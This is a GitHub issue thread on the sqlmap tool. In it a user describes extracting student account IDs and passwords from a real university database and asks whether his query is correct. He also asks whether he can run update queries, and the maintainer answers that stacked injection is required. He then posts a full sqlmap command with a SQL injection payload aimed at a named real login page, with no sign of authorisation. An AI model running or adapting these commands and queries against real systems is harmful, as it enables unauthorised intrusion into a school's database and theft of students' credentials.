### ISSUE TITLE
select table

### ISSUE THREAD

**Issue by anasri** [sqlmapproject/sqlmap#1271]
Hi stampar I found 2 databases ( educ ,framework) , In  framework databases there is a table with name all_student_account and in this there are few columns like webuserID and webuserpswd , 
I have ran --sql-shell and  now want find password that is match with webuserID . 
Could you check my query ? 

My query is , Select webuserID,webuserpswd from framework.all_student_account where webuserid='123456789'

**Comment by anasri** [comment]
i found it and now working fine thank you for developing this tool

**Comment by stamparm** [comment]
I am glad when users themselves find a solution to the problem ☺

**Comment by anasri** [comment]
thank you stamp ,  could you tell me is it possible run update query with these switches  ?

    --sql-query=QUERY   SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell

**Comment by stamparm** [comment]
Only if there is a stacked SQLi found (usually in cases of MsSQL and PostgreSQL). Without stacking you can't do non-query statements

**Comment by anasri** [comment]
ok thank you , 

I have a sql error on a website ,

Sql error :  	
	Unclosed quotation mark before the character string '' And GomCard<>1'. Line 1: Incorrect syntax near '' And GomCard<>1


Post header : __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJLTE3NjMyMDEzD2QWAgIDD2QWCAIBDw8WAh4ISW1hZ2VVcmwFFn4vaW1hZ2VzL0NpdGV4TG9nby5qcGdkZAIDDw8WAh4EVGV4dAVU2LPbjNiz2KrZhSDYp9iq2YjZhdin2LPbjNmI2YYg2KrYutiw24zZhyDZhdmI2LPYs9mHINii2YXZiNiy2LQg2LnYp9mE24wg2K7Yp9mI2LHYp9mGZGQCBQ8PFgIfAQUKMTM5NC8wMy8zMGRkAhsPZBYIAgEPZBYCZg9kFgICAQ8WAh8BBT7Zhdit2YQg2YbZhdin24zYtCDYp9i32YTYp9i524zZhyDYp9iq2YjZhdin2LPbjNmI2YYg2KrYutiw24zZh2QCAw9kFgICAQ9kFgICAQ8PFgIeB1Zpc2libGVoZGQCBA9kFgICAQ9kFgICAQ8PFgIfAmhkZAIFD2QWAgIBD2QWAgIBDw8WAh8CaGRkZNZE7%2FsaShpL32BDqAyV7U3cfViDaK%2Bh0IWPzj2BnHJM&__EVENTVALIDATION=%2FwEWBAKp98bMCAKl1bK4CQK1qbSRCwKM54rGBqfhhK%2FoxhZY7W2bhK2b3qSWuRjGbVacVy0MhMnqKtNU&txtUsername=%27&txtPassword=421l%3Bkd&Button1=%D9%88%D8%B1%D9%88%D8%AF


my command . 

sqlmap -u "http://nut.khi.ac.ir/LoginPage.aspx?ReturnURL=Default.aspx" --data "__VIEWSTATE=%2FwEPDwUJLTE3NjMyMDEzD2QWAgIDD2QWCAIBDw8WAh4ISW1hZ2VVcmwFFn4vaW1hZ2VzL0NpdGV4TG9nby5qcGdkZAIDDw8WAh4EVGV4dAVU2LPbjNiz2KrZhSDYp9iq2YjZhdin2LPbjNmI2YYg2KrYutiw24zZhyDZhdmI2LPYs9mHINii2YXZiNiy2LQg2LnYp9mE24wg2K7Yp9mI2LHYp9mGZGQCBQ8PFgIfAQUKMTM5NC8wMy8zMGRkAhsPZBYIAgEPZBYCZg9kFgICAQ8WAh8BBT7Zhdit2YQg2YbZhdin24zYtCDYp9i32YTYp9i524zZhyDYp9iq2YjZhdin2LPbjNmI2YYg2KrYutiw24zZh2QCAw9kFgICAQ9kFgICAQ8PFgIeB1Zpc2libGVoZGQCBA9kFgICAQ9kFgICAQ8PFgIfAmhkZAIFD2QWAgIBD2QWAgIBDw8WAh8CaGRkZNZE7%2FsaShpL32BDqAyV7U3cfViDaK%2Bh0IWPzj2BnHJM&__EVENTVALIDATION=%2FwEWBAKp98bMCAKl1bK4CQK1qbSRCwKM54rGBqfhhK%2FoxhZY7W2bhK2b3qSWuRjGbVacVy0MhMnqKtNU&txtUsername=Joey%27+AND+1%3D2+--+&txtPassword=vega&Button1=%D9%88%D8%B1%D9%88%D8%AF" -p txtPassword --random-agent --level=5

but I can't ineject the db , because it say , parameter not injectiable .

**Comment by anasri** [comment]
stamp , could you provide a messenger ID ? like skype or telegram ?
